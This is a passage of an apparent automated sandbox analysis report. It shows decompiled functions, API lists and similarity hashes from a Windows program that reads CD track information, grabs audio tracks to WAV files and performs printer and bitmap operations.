      0x00487bfd
      0x00487bfd
      0x00487689
      0x00487c06
      0x00487c08
      0x00487c0b
      0x00487c0e
      0x00487c1e
      0x00487c29
      0x00487c39
      0x00487c44
      0x00487c54

      APIs
      • StarBurn_SetFastReadTOC.STARBURN(00000001,00000000,00487C55,?,?,?,?,000006E4,00000000,00000000), ref: 00487574
      • StarBurn_CdvdBurnerGrabber_GetTOCInformation.STARBURN(?,?,00000400,?,?,?,00000001,00000000,00487C55,?,?,?,?,000006E4,00000000,00000000), ref: 004875B4
      • StarBurn_CdvdBurnerGrabber_GetTrackInformation.STARBURN(?,?,00000400,?,?,00000001,?), ref: 004876E5
      Strings
      • CdvdBurnerGrabber_GetTrackInformation, xrefs: 004876B2
      • Track Blank: %s, NWA valid: %s, free LBs %d, NWA %d, track number %d, xrefs: 004877BE
      • StarBurn_CdvdBurnerGrabber_GetTOCInformation() failed, exception %d, status %d, text "%s", xrefs: 0048761F
      • Track Mode: 0x%02X, MODE2 Form: 0x%02X (if Track Mode = 0x02), LB (logical block) Size In UCHARs: %d, xrefs: 00487BCE
      • Track Blank: %s, free LBs %d, track number %d, xrefs: 00487887
      • CdvdBurnerGrabber_GetTOCInformation, xrefs: 00487582
      • MCN Available: %s, ISRC Available: %s, Four Channels Audio: %s, Pre-Emphasis Audio: %s, xrefs: 00487ABB
      • TOC Index %d, Track Number: 0x%02X, Entry Valid: %s, xrefs: 0048792D
      • Size: , xrefs: 0048780D, 004878A4
      • Starting LBA %d, Starting MSF %d:%d:%d, Ending LBA %d, Ending MSF %d:%d:%d, xrefs: 004879F4
      • Data: %s, Audio: %s, Digital Copy Prohibited: %s, xrefs: 00487B5F
      Memory Dump Source
      • Source File: 00000001.00000002.247515532.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000001.00000002.247508525.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247589229.000000000048E000.00000004.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247592785.000000000048F000.00000008.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247599155.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247605132.0000000000496000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247775744.0000000000541000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247789384.000000000054E000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247812972.0000000000562000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247820645.000000000056A000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247838365.0000000000575000.00000002.00000001.01000000.00000004.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_400000_obedience.jbxd
      Similarity
      • API ID: Burn_Star$BurnerCdvdGrabber_Information$FastReadTrack
      • String ID: CdvdBurnerGrabber_GetTOCInformation$CdvdBurnerGrabber_GetTrackInformation$Data: %s, Audio: %s, Digital Copy Prohibited: %s$MCN Available: %s, ISRC Available: %s, Four Channels Audio: %s, Pre-Emphasis Audio: %s$Size: $StarBurn_CdvdBurnerGrabber_GetTOCInformation() failed, exception %d, status %d, text "%s"$Starting LBA %d, Starting MSF %d:%d:%d, Ending LBA %d, Ending MSF %d:%d:%d$TOC Index %d, Track Number: 0x%02X, Entry Valid: %s$Track Blank: %s, NWA valid: %s, free LBs %d, NWA %d, track number %d$Track Blank: %s, free LBs %d, track number %d$Track Mode: 0x%02X, MODE2 Form: 0x%02X (if Track Mode = 0x02), LB (logical block) Size In UCHARs: %d
      • API String ID: 2997071313-3986390700
      • Opcode ID: d24b323e39459afcb694a08f94bebebe0ec4b502679d36defbc307e375f31337
      • Instruction ID: 7d3ada6bbe1e602b598d1d7f8964f07f9e524a69f2f2659685a46a737e53711d
      • Opcode Fuzzy Hash: d24b323e39459afcb694a08f94bebebe0ec4b502679d36defbc307e375f31337
      • Instruction Fuzzy Hash: C6123FB4904698AECB22DF29C8917DABBF8AF09304F0485EAD44DE7341D735AB84CF55
      Uniqueness

      Uniqueness Score: -1.00%

      Function 00484270 Relevance: 24.8, APIs: 4, Strings: 10, Instructions: 262COMMON
      Download Yara Rule
      C-Code - Quality: 68%
      			E00484270(intOrPtr* __eax, void* __ebx, void* __edx, intOrPtr __edi, void* __esi, void* __fp0) {
				char _v8;
				char _v12;
				char _v16;
				char _v20;
				intOrPtr _v24;
				char _v28;
				char _v32;
				char _v36;
				char _v40;
				char _v44;
				intOrPtr _v48;
				char _v52;
				intOrPtr _v56;
				char _v60;
				signed int _v64;
				intOrPtr _v68;
				char _v72;
				char _v76;
				char _v80;
				signed int _v84;
				char _v88;
				char* _t121;
				void* _t124;
				intOrPtr _t148;
				signed char _t163;
				intOrPtr _t165;
				intOrPtr* _t166;
				intOrPtr* _t169;
				intOrPtr _t177;
				signed char _t185;
				char _t187;
				intOrPtr _t189;
				intOrPtr _t202;
				intOrPtr _t228;
				intOrPtr* _t237;
				void* _t239;
				intOrPtr _t257;
				void* _t290;
				intOrPtr _t293;
				intOrPtr _t294;

				_t302 = __fp0;
				_t287 = __edi;
				_t293 = _t294;
				_t239 = 0xa;
				do {
					_push(0);
					_push(0);
					_t239 = _t239 - 1;
				} while (_t239 != 0);
				_push(_t239);
				_push(__esi);
				_push(__edi);
				_t237 = __eax;
				_push(_t293);
				_push(0x4845fb);
				_push( *[fs:eax]);
				 *[fs:eax] = _t294;
				E00482618(__eax, __eax, __edx, __edi, __esi, __fp0);
				 *((char*)(_t237 + 0x14)) = 1;
				_t121 =  *0x48f6f4; // 0x490c44
				 *_t121 = 1;
				_push(1);
				L00465EFC();
				L00465F0C();
				_t124 = E0041A9F0( *((intOrPtr*)(_t237 + 0x20))) - 1;
				if(_t124 < 0) {
					L18:
					E00409668(0x3b3e,  &_v88);
					 *((intOrPtr*)( *_t237 + 0x14))();
					_pop(_t257);
					 *[fs:eax] = _t257;
					_push(0x484602);
					E00404A40( &_v88);
					E00404A64( &_v76, 3);
					E00404A64( &_v40, 6);
					return E00404A40( &_v12);
				}
				_v16 = _t124 + 1;
				_v8 = 0;
				while(1) {
					_t290 = E0047FA4C( *((intOrPtr*)(_t237 + 0x20)), _v8);
					_t299 =  *((char*)(_t290 + 0x14)) - 1;
					if( *((char*)(_t290 + 0x14)) != 1) {
						E00404AD8( &_v12,  *((intOrPtr*)(_t290 + 0x10)));
					} else {
						E0047BE24(0x484614, _t237,  &_v20, _t299);
						E00404D4C( &_v12, 0x484620, _v20);
					}
					if( *((char*)( *((intOrPtr*)( *((intOrPtr*)(_t237 + 0x10)) + 0x18)) + 0xd4)) != 0) {
						break;
					}
					E004091E4( &_v28);
					E00404DC0();
					_t148 =  *0x490c50; // 0x0
					E0047FD7C(_t148, _t237, 0, _v24, _t287, _t290, _t302);
					E004091E4( &_v36);
					E00404D4C( &_v32, _v36, "Grabbing Track # ");
					 *((intOrPtr*)( *_t237 + 0x14))( *((intOrPtr*)(_t290 + 0x10)), ", Output file: ", _v28, "CdvdBurnerGrabber_GrabTrack: Track #");
					_push(1);
					_push(0);
					_push(1);
					_push(1);
					_push(E00404F00(_v12));
					_push( *((intOrPtr*)(_t290 + 0xc)));
					_t287 =  *((intOrPtr*)( *((intOrPtr*)(_t237 + 0x10)) + 0x18));
					_push(_t287 + 0x4e8);
					_push(_t287 + 0xe4);
					_push(0x400);
					_push(_t287 + 0xe8);
					_t163 =  *(_t287 + 0xd8);
					_push(_t163);
					L00465EB4();
					 *( *((intOrPtr*)( *((intOrPtr*)(_t237 + 0x10)) + 0x18)) + 0xe0) = _t163;
					_t165 =  *((intOrPtr*)( *((intOrPtr*)(_t237 + 0x10)) + 0x18));
					__eflags =  *((char*)(_t165 + 0xe0));
					if( *((char*)(_t165 + 0xe0)) == 0) {
						_t166 =  *0x48f84c; // 0x490c48
						E0047FAFC( *_t166, 0x64);
					} else {
						_v64 =  *( *((intOrPtr*)( *((intOrPtr*)(_t237 + 0x10)) + 0x18)) + 0xe0) & 0x000000ff;
						_v60 = 0;
						_v56 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t237 + 0x10)) + 0x18)) + 0xe4));
						_v52 = 0;
						_v48 =  *((intOrPtr*)( *((intOrPtr*)(_t237 + 0x10)) + 0x18)) + 0xe8;
						_v44 = 6;
						E0040A164("StarBurn_CdvdBurnerGrabber_SetCDTextItem() failed, exception %d, status %d, text \"%s\"", 2,  &_v64,  &_v40);
						E00404A94( *((intOrPtr*)( *((intOrPtr*)(_t237 + 0x10)) + 0x18)) + 4, _v40);
						_t228 =  *0x490c50; // 0x0
						E0047FD7C(_t228, _t237, 0,  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t237 + 0x10)) + 0x18)) + 4)), _t287, _t290, _t302);
						 *((char*)(_t237 + 0x14)) = 0;
					}
					__eflags =  *((char*)(_t290 + 0x14)) - 1;
					if( *((char*)(_t290 + 0x14)) == 1) {
						_t169 =  *0x48f84c; // 0x490c48
						E0047FB14( *_t169, 0);
						_push("StarWave_UncompressedFileCompress: ");
						_push(_v12);
						_push(" -> ");
						_push( *((intOrPtr*)(_t290 + 0x10)));
						_push(" with compression: ");
						E004091E4( &_v72);
						_push(_v72);
						E00404DC0();
						_t177 =  *0x490c50; // 0x0
						E0047FD7C(_t177, _t237, 0, _v68, _t287, _t290, _t302);
						_push( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t237 + 0x10)) + 0x18)) + 0xb8)));
						_push(_t237);
						_push(E0047DB78);
						_push(0x2b110);
						_push(E00404F00( *((intOrPtr*)(_t290 + 0x10))));
						_t185 = E00404F00(_v12);
						_push(_t185);
						L00465F24();
						 *( *((intOrPtr*)( *((intOrPtr*)(_t237 + 0x10)) + 0x18)) + 0xe0) = _t185;
						_t187 = E00409800(_v12, __eflags);
						__eflags = _t187;
						if(_t187 != 0) {
							E00409834(_v12);
						}
						_t189 =  *((intOrPtr*)( *((intOrPtr*)(_t237 + 0x10)) + 0x18));
						__eflags =  *((char*)(_t189 + 0xe0));
						if( *((char*)(_t189 + 0xe0)) != 0) {
							_v84 =  *( *((intOrPtr*)( *((intOrPtr*)(_t237 + 0x10)) + 0x18)) + 0xe0) & 0x000000ff;
							_v80 = 0;
							E0040A164("StarBurn_StarWave_UncompressedFileCompress() failed, exception %d", 0,  &_v84,  &_v76);
							E00404A94( *((intOrPtr*)( *((intOrPtr*)(_t237 + 0x10)) + 0x18)) + 4, _v76);
							__eflags = 0;
							_t202 =  *0x490c50; // 0x0
							E0047FD7C(_t202, _t237, 0,  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t237 + 0x10)) + 0x18)) + 4)), _t287, _t290, _t302);
							 *((char*)(_t237 + 0x14)) = 0;
							E0040CBEC( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t237 + 0x10)) + 0x18)) + 4)), 1);
							E004043D0();
						}
					}
					_v8 = _v8 + 1;
					_t108 =  &_v16;
					 *_t108 = _v16 - 1;
					__eflags =  *_t108;
					if(__eflags != 0) {
						continue;
					} else {
						goto L18;
					}
				}
				 *((intOrPtr*)( *_t237 + 0x14))();
				goto L18;
			}











































      0x00484270
      0x00484270
      0x00484271
      0x00484273
      0x00484278
      0x00484278
      0x0048427a
      0x0048427c
      0x0048427c
      0x0048427f
      0x00484281
      0x00484282
      0x00484283
      0x00484287
      0x00484288
      0x0048428d
      0x00484290
      0x00484295
      0x0048429a
      0x0048429e
      0x004842a3
      0x004842a6
      0x004842a8
      0x004842ad
      0x004842bc
      0x004842bf
      0x004845aa
      0x004845b2
      0x004845c0
      0x004845c5
      0x004845c8
      0x004845cb
      0x004845d3
      0x004845e0
      0x004845ed
      0x004845fa
      0x004845fa
      0x004842c6
      0x004842c9
      0x004842d0
      0x004842db
      0x004842dd
      0x004842e1
      0x00484308
      0x004842e3
      0x004842eb
      0x004842fb
      0x004842fb
      0x0048431a
      0x00000000
      0x00000000
      0x0048433a
      0x00484352
      0x0048435c
      0x00484361
      0x0048436c
      0x0048437c
      0x0048438a
      0x0048438d
      0x0048438f
      0x00484391
      0x00484393
      0x0048439d
      0x004843a1
      0x004843a5
      0x004843ae
      0x004843b5
      0x004843b6
      0x004843c1
      0x004843c2
      0x004843c8
      0x004843c9
      0x004843d4
      0x004843dd
      0x004843e0
      0x004843e7
      0x00484464
      0x00484470
      0x004843e9
      0x004843fa
      0x004843fd
      0x0048440d
      0x00484410
      0x0048441f
      0x00484422
      0x00484433
      0x00484444
      0x00484454
      0x00484459
      0x0048445e
      0x0048445e
      0x00484475
      0x00484479
      0x0048447f
      0x00484488
      0x0048448d
      0x00484492
      0x00484495
      0x0048449a
      0x0048449d
      0x004844b1
      0x004844b6
      0x004844c1
      0x004844cb
      0x004844d0
      0x004844e1
      0x004844e2
      0x004844e3
      0x004844e8
      0x004844f5
      0x004844f9
      0x004844fe
      0x004844ff
      0x0048450a
      0x00484513
      0x00484518
      0x0048451a
      0x0048451f
      0x0048451f
      0x00484527
      0x0048452a
      0x00484531
      0x00484544
      0x00484547
      0x00484555
      0x00484566
      0x00484574
      0x00484576
      0x0048457b
      0x00484580
      0x00484594
      0x00484599
      0x00484599
      0x00484531
      0x0048459e
      0x004845a1
      0x004845a1
      0x004845a1
      0x004845a4
      0x00000000
      0x00000000
      0x00000000
      0x00000000
      0x004845a4
      0x00484327
      0x00000000

      APIs
      • StarBurn_SetFastReadTOC.STARBURN(00000001,00000000,004845FB,?,?,?,?,00000009,00000000,00000000), ref: 004842A8
      • StarBurn_GetFastReadTOC.STARBURN(00000001,00000000,004845FB,?,?,?,?,00000009,00000000,00000000), ref: 004842AD
      • StarBurn_CdvdBurnerGrabber_GrabTrack.STARBURN(?,?,00000400,?,?,?,00000000,00000001,00000001,00000000,00000001), ref: 004843C9
      • StarBurn_StarWave_UncompressedFileCompress.STARBURN(00000000,00000000,0002B110,Function_0007DB78,?,?,?, with compression: ,?, -> ,?,StarWave_UncompressedFileCompress: ,?,?,00000400,?), ref: 004844FF
      Strings
      • Grabbing canceled!, xrefs: 0048431E
      • StarWave_UncompressedFileCompress: , xrefs: 0048448D
      • CdvdBurnerGrabber_GrabTrack: Track #, xrefs: 0048432F
      • -> , xrefs: 00484495
      • , Output file: , xrefs: 00484342
      • Grabbing Track # , xrefs: 00484377
      • with compression: , xrefs: 0048449D
      • StarBurn_StarWave_UncompressedFileCompress() failed, exception %d, xrefs: 00484550
      • .wav, xrefs: 004842F6
      • StarBurn_CdvdBurnerGrabber_SetCDTextItem() failed, exception %d, status %d, text "%s", xrefs: 0048442E
      Memory Dump Source
      • Source File: 00000001.00000002.247515532.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000001.00000002.247508525.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247589229.000000000048E000.00000004.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247592785.000000000048F000.00000008.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247599155.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247605132.0000000000496000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247775744.0000000000541000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247789384.000000000054E000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247812972.0000000000562000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247820645.000000000056A000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247838365.0000000000575000.00000002.00000001.01000000.00000004.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_400000_obedience.jbxd
      Similarity
      • API ID: Star$Burn_$FastRead$BurnerCdvdCompressFileGrabGrabber_TrackUncompressedWave_
      • String ID: -> $ with compression: $, Output file: $.wav$CdvdBurnerGrabber_GrabTrack: Track #$Grabbing Track # $Grabbing canceled!$StarBurn_CdvdBurnerGrabber_SetCDTextItem() failed, exception %d, status %d, text "%s"$StarBurn_StarWave_UncompressedFileCompress() failed, exception %d$StarWave_UncompressedFileCompress:
      • API String ID: 4052944251-577030503
      • Opcode ID: bb6ec19f933283665ddc7c244471772de827383cc4dd08eb64c38165ba5b0c32
      • Instruction ID: 8c6f94eb419f18c1f99b6b37dbd38fc82ffd7b951bff87a90bc80ce016348b60
      • Opcode Fuzzy Hash: bb6ec19f933283665ddc7c244471772de827383cc4dd08eb64c38165ba5b0c32
      • Instruction Fuzzy Hash: 78B16C746002459FCB04EFA8D881B9E77F5BF48304F1049AAE905AB3A6C778ED45CB68
      Uniqueness

      Uniqueness Score: -1.00%

      Function 0042F52C Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 198memoryCOMMON
      Download Yara Rule
      C-Code - Quality: 69%
      			E0042F52C(void* __eax, void* __ebx, intOrPtr __ecx, char __edx, void* __edi, void* __esi, void* __eflags, void* _a4, intOrPtr _a8) {
				char _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr* _v20;
				char _v176;
				char _v180;
				char _v184;
				char _v188;
				intOrPtr _v192;
				char _v196;
				char _v200;
				void* _t73;
				long _t76;
				intOrPtr _t85;
				long _t95;
				void* _t96;
				long _t98;
				intOrPtr _t112;
				void* _t134;
				void* _t135;
				void* _t136;
				intOrPtr _t138;
				intOrPtr _t152;
				void* _t169;
				void* _t170;
				void* _t171;
				void* _t173;
				void* _t176;

				_t167 = __edi;
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_v180 = 0;
				_v184 = 0;
				_v12 = __ecx;
				_v8 = __edx;
				_t173 = __eax;
				_t134 = _a4;
				_push(_t176);
				_push(0x42f76d);
				_push( *[fs:eax]);
				 *[fs:eax] = _t176 + 0xffffff3c;
				E0042F394(__eax, 0);
				_t73 =  *(_t173 + 0x28);
				if(_t134 != _t73) {
					 *(_t173 + 0x28) = _t134;
				}
				_t135 =  *(_t173 + 0x28);
				if(_t135 != 0) {
					GlobalFix(_t135);
					_t167 = _t73;
					 *(_t173 + 0x24) = _t73;
					E0042F4F0(_t173,  *((intOrPtr*)(_t73 + 0x28)));
				}
				E0042FC90(_t173);
				_t76 =  *(_t173 + 0x2c);
				if(_t76 != 0) {
					_push(_t76);
					L0042ECF0();
					 *(_t173 + 0x2c) = 0;
				}
				E0042F268(_t173, _t135, 0, _t167, _t173);
				_v16 = 0xffffffff;
				_v20 = E0042F804(_t173, _t135, _t167, _t173);
				_t169 =  *((intOrPtr*)( *_v20 + 0x14))() - 1;
				if(_t169 < 0) {
					L13:
					if(_v16 == 0xffffffff) {
						_v16 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t173 + 0x10)))) + 0x14))();
						_t112 =  *0x48f5ec; // 0x423b58
						E00406A3C(_t112, _v12,  &_v184);
						_v200 = _v8;
						_v196 = 6;
						_v192 = _a8;
						_v188 = 6;
						E0040A164(_v184, 1,  &_v200,  &_v180);
						 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t173 + 0x10)))) + 0x3c))(E0042EF14(_v12, 1, _a8, _v8));
					}
					 *((intOrPtr*)(_t173 + 0x14)) = _v16;
					_push(0);
					_push(_t173 + 0x2c);
					_t85 = _v8;
					_push(_t85);
					L0042ED08();
					if(_t85 != 0) {
						if( *(_t173 + 0x28) == 0) {
							_push(0);
							_push( &_v176);
							_push( &_v176);
							_push(_v8);
							_t95 =  *(_t173 + 0x2c);
							_push(_t95);
							_push(0);
							L0042ECF8();
							_t96 = GlobalAlloc(0x42, _t95);
							_t136 = _t96;
							 *(_t173 + 0x28) = _t136;
							if(_t136 != 0) {
								GlobalFix(_t136);
								_t170 = _t96;
								 *(_t173 + 0x24) = _t170;
								_push(2);
								_push(_t170);
								_push(_t170);
								_push(_v8);
								_t98 =  *(_t173 + 0x2c);
								_push(_t98);
								_push(0);
								L0042ECF8();
								if(_t98 < 0) {
									GlobalUnWire( *(_t173 + 0x28));
									GlobalFree( *(_t173 + 0x28));
									 *(_t173 + 0x28) = 0;
									 *(_t173 + 0x24) = 0;
								}
							}
						}
						if( *(_t173 + 0x28) != 0) {
							E0042F4F0(_t173,  *((intOrPtr*)( *(_t173 + 0x24) + 0x28)));
						}
					}
					_pop(_t152);
					 *[fs:eax] = _t152;
					_push(0x42f774);
					return E00404A64( &_v184, 2);
				} else {
					_t171 = _t169 + 1;
					_t138 = 0;
					while(E0042EF74( *((intOrPtr*)( *_v20 + 0x18))(), _t138, _v8, _t173, _a8) == 0) {
						_t138 = _t138 + 1;
						_t171 = _t171 - 1;
						if(_t171 != 0) {
							continue;
						}
						goto L13;
					}
					E00404C38( *((intOrPtr*)( *_v20 + 0x18))() + 0xc, _a8);
					_v16 = _t138;
					goto L13;
				}
			}































      0x0042f52c
      0x0042f535
      0x0042f536
      0x0042f537
      0x0042f53a
      0x0042f540
      0x0042f546
      0x0042f549
      0x0042f54c
      0x0042f54e
      0x0042f553
      0x0042f554
      0x0042f559
      0x0042f55c
      0x0042f563
      0x0042f568
      0x0042f56d
      0x0042f587
      0x0042f587
      0x0042f58a
      0x0042f58f
      0x0042f592
      0x0042f597
      0x0042f599
      0x0042f5a1
      0x0042f5a1
      0x0042f5a8
      0x0042f5ad
      0x0042f5b2
      0x0042f5b4
      0x0042f5b5
      0x0042f5bc
      0x0042f5bc
      0x0042f5c3
      0x0042f5c8
      0x0042f5d6
      0x0042f5e3
      0x0042f5e6
      0x0042f626
      0x0042f62a
      0x0042f634
      0x0042f65c
      0x0042f661
      0x0042f66f
      0x0042f675
      0x0042f67f
      0x0042f685
      0x0042f697
      0x0042f6a8
      0x0042f6a8
      0x0042f6ae
      0x0042f6b1
      0x0042f6b6
      0x0042f6b7
      0x0042f6ba
      0x0042f6bb
      0x0042f6c2
      0x0042f6cc
      0x0042f6ce
      0x0042f6d6
      0x0042f6dd
      0x0042f6e1
      0x0042f6e2
      0x0042f6e5
      0x0042f6e6
      0x0042f6e8
      0x0042f6f0
      0x0042f6f5
      0x0042f6f7
      0x0042f6fc
      0x0042f6ff
      0x0042f704
      0x0042f706
      0x0042f709
      0x0042f70b
      0x0042f70c
      0x0042f710
      0x0042f711
      0x0042f714
      0x0042f715
      0x0042f717
      0x0042f71e
      0x0042f724
      0x0042f72d
      0x0042f734
      0x0042f739
      0x0042f739
      0x0042f71e
      0x0042f6fc
      0x0042f740
      0x0042f74a
      0x0042f74a
      0x0042f740
      0x0042f751
      0x0042f754
      0x0042f757
      0x0042f76c
      0x0042f5e8
      0x0042f5e8
      0x0042f5e9
      0x0042f5eb
      0x0042f622
      0x0042f623
      0x0042f624
      0x00000000
      0x00000000
      0x00000000
      0x0042f624
      0x0042f618
      0x0042f61d
      0x00000000
      0x0042f61d

      APIs
      • GlobalUnWire.KERNEL32(?), ref: 0042F574
      • GlobalFree.KERNEL32 ref: 0042F57D
      • GlobalFix.KERNEL32 ref: 0042F592
      • 737ED660.WINSPOOL.DRV(?,00000000,0042F76D,?,00000000,00000000,00000000), ref: 0042F5B5
      • 738030C0.WINSPOOL.DRV(?,?,00000000,?,00000000,00000000,00000000), ref: 0042F6BB
      • 738015A0.WINSPOOL.DRV(00000000,?,?,?,?,00000000,?,?,?,?,?,?,00000000,?,00000000,00000000), ref: 0042F6E8
      • GlobalAlloc.KERNEL32(00000042,00000000,00000000,?,?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 0042F6F0
      • GlobalFix.KERNEL32 ref: 0042F6FF
      • 738015A0.WINSPOOL.DRV(00000000,?,?,00000000,00000000,00000002,00000000,00000042,00000000,00000000,?,?,?,?,00000000), ref: 0042F717
      • GlobalUnWire.KERNEL32(00000000), ref: 0042F724
      • GlobalFree.KERNEL32 ref: 0042F72D
      Strings
      Memory Dump Source
      • Source File: 00000001.00000002.247515532.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000001.00000002.247508525.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247589229.000000000048E000.00000004.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247592785.000000000048F000.00000008.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247599155.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247605132.0000000000496000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247775744.0000000000541000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247789384.000000000054E000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247812972.0000000000562000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247820645.000000000056A000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247838365.0000000000575000.00000002.00000001.01000000.00000004.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_400000_obedience.jbxd
      Similarity
      • API ID: Global$738015FreeWire$738030AllocD660.
      • String ID: X;B$B
      • API String ID: 3219947479-3409252510
      • Opcode ID: 9b84f64c0619e1b0be432098d5e6a555225b6a8b71958c4fd278bad5face3bc0
      • Instruction ID: ea043fd258ca3b0cf3d5dfe57d4600f1f5799c7de3d824af7fb817a2158fd3f1
      • Opcode Fuzzy Hash: 9b84f64c0619e1b0be432098d5e6a555225b6a8b71958c4fd278bad5face3bc0
      • Instruction Fuzzy Hash: 48714A70B00614AFCB10DF6AD880A4BB7F9AF48314F90467AE909D7351DB34ED45CB59
      Uniqueness

      Uniqueness Score: -1.00%

      Function 0042AC18 Relevance: 21.2, APIs: 14, Instructions: 217windowCOMMON
      Download Yara Rule
      C-Code - Quality: 71%
      			E0042AC18(intOrPtr* __eax, void* __ebx, signed int __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _v8;
				void* _v12;
				char _v13;
				struct tagPOINT _v21;
				struct HDC__* _v28;
				void* _v32;
				intOrPtr _t78;
				struct HDC__* _t80;
				signed int _t82;
				signed int _t83;
				signed int _t84;
				char _t85;
				void* _t92;
				struct HDC__* _t115;
				void* _t136;
				struct HDC__* _t160;
				intOrPtr* _t164;
				intOrPtr _t172;
				intOrPtr _t176;
				intOrPtr _t178;
				intOrPtr _t180;
				int* _t184;
				intOrPtr _t186;
				void* _t188;
				void* _t189;
				intOrPtr _t190;

				_t165 = __ecx;
				_t188 = _t189;
				_t190 = _t189 + 0xffffffe4;
				_t184 = __ecx;
				_v8 = __edx;
				_t164 = __eax;
				_t186 =  *((intOrPtr*)(__eax + 0x28));
				_t172 =  *0x42ae64; // 0xf
				E00426BD4(_v8, __ecx, _t172);
				E0042B1A8(_t164);
				_v12 = 0;
				_v13 = 0;
				_t78 =  *((intOrPtr*)(_t186 + 0x10));
				if(_t78 != 0) {
					_push(0xffffffff);
					_push(_t78);
					_t160 =  *(_v8 + 4);
					_push(_t160);
					L00407420();
					_v12 = _t160;
					_push( *(_v8 + 4));
					L004073F0();
					_v13 = 1;
				}
				_push(0xc);
				_t80 =  *(_v8 + 4);
				_push(_t80);
				L00407348();
				_push(_t80);
				_push(0xe);
				_t82 =  *(_v8 + 4);
				L00407348();
				_t83 = _t82;
				_t84 = _t83 * _t82;
				if(_t84 > 8) {
					L4:
					_t85 = 0;
				} else {
					_t165 =  *(_t186 + 0x28) & 0x0000ffff;
					if(_t84 < ( *(_t186 + 0x2a) & 0x0000ffff) * ( *(_t186 + 0x28) & 0x0000ffff)) {
						_t85 = 1;
					} else {
						goto L4;
					}
				}
				if(_t85 == 0) {
					if(E0042AFA4(_t164) == 0) {
						SetStretchBltMode(E00426B00(_v8), 3);
					}
				} else {
					GetBrushOrgEx( *(_v8 + 4),  &_v21);
					SetStretchBltMode( *(_v8 + 4), 4);
					SetBrushOrgEx( *(_v8 + 4), _v21, _v21.y,  &_v21);
				}
				_push(_t188);
				_push(0x42ae54);
				_push( *[fs:eax]);
				 *[fs:eax] = _t190;
				if( *((intOrPtr*)( *_t164 + 0x28))() != 0) {
					E0042B148(_t164, _t165);
				}
				_t92 = E0042AEE8(_t164);
				_t176 =  *0x42ae64; // 0xf
				E00426BD4(_t92, _t165, _t176);
				if( *((intOrPtr*)( *_t164 + 0x28))() == 0) {
					StretchBlt( *(_v8 + 4),  *_t184, _t184[1], _t184[2] -  *_t184, _t184[3] - _t184[1],  *(E0042AEE8(_t164) + 4), 0, 0,  *(_t186 + 0x1c),  *(_t186 + 0x20),  *(_v8 + 0x20));
					_pop(_t178);
					 *[fs:eax] = _t178;
					_push(0x42ae5b);
					if(_v13 != 0) {
						_push(0xffffffff);
						_push(_v12);
						_t115 =  *(_v8 + 4);
						_push(_t115);
						L00407420();
						return _t115;
					}
					return 0;
				} else {
					_v32 = 0;
					_v28 = 0;
					_push(_t188);
					_push(0x42ade9);
					_push( *[fs:eax]);
					 *[fs:eax] = _t190;
					L00407280();
					_v28 = E00426EF8(0);
					_v32 = SelectObject(_v28,  *(_t186 + 0xc));
					E0042709C( *(_v8 + 4), _t164, _t184[1],  *_t184, _t184, _t186, 0, 0, _v28,  *(_t186 + 0x20),  *(_t186 + 0x1c), 0, 0,  *(E0042AEE8(_t164) + 4), _t184[3] - _t184[1], _t184[2] -  *_t184);
					_t136 = 0;
					_t180 = 0;
					 *[fs:eax] = _t180;
